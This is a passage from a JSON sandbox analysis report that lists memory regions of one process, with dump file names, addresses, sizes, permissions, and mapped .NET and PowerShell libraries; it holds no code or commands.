"region", "version": 1 }, "end_va": 43122687, "entry_point": 0, "filename": null, "id": "region_690", "name": "private_0x0000000002910000", "norm_filename": null, "region_type": "private_memory", "start_va": 43057152, "timestamp": "00:01:42.612", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000691-addr_0x00000000029d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_672", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 43843584, "type": "region", "version": 1 }, "end_va": 44892159, "entry_point": 0, "filename": null, "id": "region_691", "name": "private_0x00000000029d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43843584, "timestamp": "00:01:42.612", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000692-addr_0x0000000002ad0000-size_0x0000000000101000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_673", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 44892160, "type": "region", "version": 1 }, "end_va": 45944831, "entry_point": 0, "filename": null, "id": "region_692", "name": "private_0x0000000002ad0000", "norm_filename": null, "region_type": "private_memory", "start_va": 44892160, "timestamp": "00:01:42.613", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000693-addr_0x0000000002c40000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_674", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 46399488, "type": "region", "version": 1 }, "end_va": 46923775, "entry_point": 0, "filename": null, "id": "region_693", "name": "private_0x0000000002c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 46399488, "timestamp": "00:01:42.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 402653184, "start_va": 46923776, "type": "region", "version": 1 }, "end_va": 449576959, "entry_point": 0, "filename": null, "id": "region_694", "name": "private_0x0000000002cc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46923776, "timestamp": "00:01:42.622", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000695-addr_0x000000001acc0000-size_0x00000000006d0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_675", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 7143424, "start_va": 449576960, "type": "region", "version": 1 }, "end_va": 456720383, "entry_point": 0, "filename": null, "id": "region_695", "name": "private_0x000000001acc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 449576960, "timestamp": "00:01:42.622", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000696-addr_0x000000001b500000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_676", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 458227712, "type": "region", "version": 1 }, "end_va": 458751999, "entry_point": 0, "filename": null, "id": "region_696", "name": "private_0x000000001b500000", "norm_filename": null, "region_type": "private_memory", "start_va": 458227712, "timestamp": "00:01:42.622", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 15581184, "start_va": 8791576084480, "type": "region", "version": 1 }, "end_va": 8791591665663, "entry_point": 8791576084480, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "id": "region_697", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791576084480, "timestamp": "00:01:42.623", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000698-addr_0x000007ff00040000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_677", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798317056, "type": "region", "version": 1 }, "end_va": 8791798382591, "entry_point": 0, "filename": null, "id": "region_698", "name": "private_0x000007ff00040000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798317056, "timestamp": "00:01:42.631", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000699-addr_0x000007ff00050000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_678", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798382592, "type": "region", "version": 1 }, "end_va": 8791798448127, "entry_point": 0, "filename": null, "id": "region_699", "name": "private_0x000007ff00050000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798382592, "timestamp": "00:01:42.631", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000700-addr_0x000007ff00060000-size_0x00000000000a0000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_679", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 8791798448128, "type": "region", "version": 1 }, "end_va": 8791799103487, "entry_point": 0, "filename": null, "id": "region_700", "name": "private_0x000007ff00060000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798448128, "timestamp": "00:01:42.631", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000701-addr_0x000007ff00100000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_680", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799103488, "type": "region", "version": 1 }, "end_va": 8791799169023, "entry_point": 0, "filename": null, "id": "region_701", "name": "private_0x000007ff00100000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799103488, "timestamp": "00:01:42.631", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000702-addr_0x000007ff00110000-size_0x0000000000070000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_681", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 8791799169024, "type": "region", "version": 1 }, "end_va": 8791799627775, "entry_point": 0, "filename": null, "id": "region_702", "name": "private_0x000007ff00110000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799169024, "timestamp": "00:01:42.632", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000703-addr_0x000007fffffd4000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_682", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092841984, "type": "region", "version": 1 }, "end_va": 8796092850175, "entry_point": 0, "filename": null, "id": "region_703", "name": "private_0x000007fffffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092841984, "timestamp": "00:01:42.632", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000704-addr_0x000007fffffd6000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_683", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092858367, "entry_point": 0, "filename": null, "id": "region_704", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:01:42.632", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000705-addr_0x000007fffff10000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_684", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8796092039168, "type": "region", "version": 1 }, "end_va": 8796092104703, "entry_point": 0, "filename": null, "id": "region_705", "name": "private_0x000007fffff10000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092039168, "timestamp": "00:01:42.666", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000706-addr_0x000007fffff20000-size_0x0000000000090000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_685", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 589824, "start_va": 8796092104704, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_706", "name": "private_0x000007fffff20000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092104704, "timestamp": "00:01:42.666", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000707-addr_0x0000000001d50000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_686", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30736384, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_707", "name": "private_0x0000000001d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 30736384, "timestamp": "00:01:43.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 458752000, "type": "region", "version": 1 }, "end_va": 461774847, "entry_point": 458752000, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_708", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 458752000, "timestamp": "00:01:43.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10629120, "start_va": 8791565402112, "type": "region", "version": 1 }, "end_va": 8791576031231, "entry_point": 8791565402112, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll", "id": "region_709", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791565402112, "timestamp": "00:01:43.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 729088, "start_va": 8791596662784, "type": "region", "version": 1 }, "end_va": 8791597391871, "entry_point": 8791596662784, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_710", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791596662784, "timestamp": "00:01:43.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11915264, "start_va": 8791553474560, "type": "region", "version": 1 }, "end_va": 8791565389823, "entry_point": 8791553474560, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll", "id": "region_711", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791553474560, "timestamp": "00:01:43.407", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000712-addr_0x000007ff00180000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_687", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799627776, "type": "region", "version": 1 }, "end_va": 8791799693311, "entry_point": 0, "filename": null, "id": "region_712", "name": "private_0x000007ff00180000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799627776, "timestamp": "00:01:43.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 31457280, "type": "region", "version": 1 }, "end_va": 31469567, "entry_point": 31457280, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_713", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 31457280, "timestamp": "00:01:43.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 42139648, "type": "region", "version": 1 }, "end_va": 42926079, "entry_point": 42139648, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_714", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 42139648, "timestamp": "00:01:43.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006384640, "type": "region", "version": 1 }, "end_va": 2006413311, "entry_point": 2006388844, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_715", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006384640, "timestamp": "00:01:43.501", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000716-addr_0x0000000001e10000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_688", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 31522816, "type": "region", "version": 1 }, "end_va": 31526911, "entry_point": 0, "filename": null, "id": "region_716", "name": "private_0x0000000001e10000", "norm_filename": null, "region_type": "private_memory", "start_va": 31522816, "timestamp": "00:01:43.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 31588352, "type": "region", "version": 1 }, "end_va": 31608831, "entry_point": 31588352, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_717", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 31588352, "timestamp": "00:01:43.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 40239104, "type": "region", "version": 1 }, "end_va": 40505343, "entry_point": 40239104, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_718", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 40239104, "timestamp": "00:01:43.620", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000719-addr_0x000007ff00190000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_689", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799693312, "type": "region", "version": 1 }, "end_va": 8791799758847, "entry_point": 0, "filename": null, "id": "region_719", "name": "private_0x000007ff00190000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799693312, "timestamp": "00:01:43.620", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 40566784, "type": "region", "version": 1 }, "end_va": 40599551, "entry_point": 40566784, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_720", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 40566784, "timestamp": "00:01:44.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 42926080, "type": "region", "version": 1 }, "end_va": 42930175, "entry_point": 0, "filename": null, "id": "region_721", "name": "pagefile_0x00000000028f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 42926080, "timestamp": "00:01:44.078", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000722-addr_0x000000001b390000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_690", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 456720384, "type": "region", "version": 1 }, "end_va": 457768959, "entry_point": 0, "filename": null, "id": "region_722", "name": "private_0x000000001b390000", "norm_filename": null, "region_type": "private_memory", "start_va": 456720384, "timestamp": "00:01:44.078", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 299008, "start_va": 505610240, "type": "region", "version": 1 }, "end_va": 505909247, "entry_point": 505610240, "filename": "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_723", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 505610240, "timestamp": "00:01:44.078", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 937984, "start_va": 8791549149184, "type": "region", "version": 1 }, "end_va": 8791550087167, "entry_point": 8791549149184, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll", "id": "region_724", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791549149184, "timestamp": "00:01:44.089", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3334144, "start_va": 8791550132224, "type": "region", "version": 1 }, "end_va": 8791553466367, "entry_point": 8791550132224, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll", "id": "region_725", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791550132224, "timestamp": "00:01:44.098", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 696320, "start_va": 8791594631168, "type": "region", "version": 1 }, "end_va": 8791595327487, "entry_point": 8791594631168, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll", "id": "region_726", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791594631168, "timestamp": "00:01:44.106", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 8791596400640, "type": "region", "version": 1 }, "end_va": 8791596605439, "entry_point": 8791596400640, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll", "id": "region_727", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791596400640, "timestamp": "00:01:44.114", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 8791597645824, "type": "region", "version": 1 }, "end_va": 8791598075903, "entry_point": 8791597645824, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_728", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791597645824, "timestamp": "00:01:44.123", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 42991616, "type": "region", "version": 1 }, "end_va": 42995711, "entry_point": 0, "filename": null, "id": "region_729", "name": "pagefile_0x0000000002900000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 42991616, "timestamp": "00:01:44.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 6884820647936, "type": "region", "version": 1 }, "end_va": 6884820688895, "entry_point": 6884820647936, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll", "id": "region_730", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 6884820647936, "timestamp": "00:01:44.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1146880, "start_va": 8791545741312, "type": "region", "version": 1 }, "end_va": 8791546888191, "entry_point": 8791545741312, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_731", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791545741312, "timestamp": "00:01:44.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2187264, "start_va": 8791546920960, "type": "region", "version": 1 }, "end_va": 8791549108223, "entry_point": 8791546920960, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_732", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791546920960, "timestamp": "00:01:44.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 253952, "start_va": 8791596138496, "type": "region", "version": 1 }, "end_va": 8791596392447, "entry_point": 8791596138496, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll", "id": "region_733", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791596138496, "timestamp": "00:01:44.633", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 46006272, "type": "region", "version": 1 }, "end_va": 46350335, "entry_point": 46006272, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll", "id": "region_734", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 46006272, "timestamp": "00:01:44.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1658880, "start_va": 8791535517696, "type": "region", "version": 1 }, "end_va": 8791537176575, "entry_point": 8791535517696, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll", "id": "region_735", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791535517696, "timestamp": "00:01:44.938", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1490944, "start_va": 8791537221632, "type": "region", "version": 1 }, "end_va": 8791538712575, "entry_point": 8791537221632, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll", "id": "region_736", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll", "region_type": "memory_mapped_file", 